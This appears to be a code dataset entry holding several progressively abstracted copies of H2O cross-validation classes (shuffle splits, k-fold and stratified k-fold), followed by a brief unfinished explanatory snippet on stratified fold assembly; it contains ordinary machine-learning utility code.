n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
\n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. 
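The test_folds assembly in _make_test_folds is the subtle part: one KFold per class is built, and fold i of every class lands in global fold i, preserving class ratios. A numpy-only sketch of the same idea, with round-robin assignment standing in for the per-class KFold splits (the SK18 branch above only papers over a sklearn signature change):

import numpy as np

target = np.array([0, 0, 0, 0, 1, 1, 1, 1, 1, 1])
n_folds = 2
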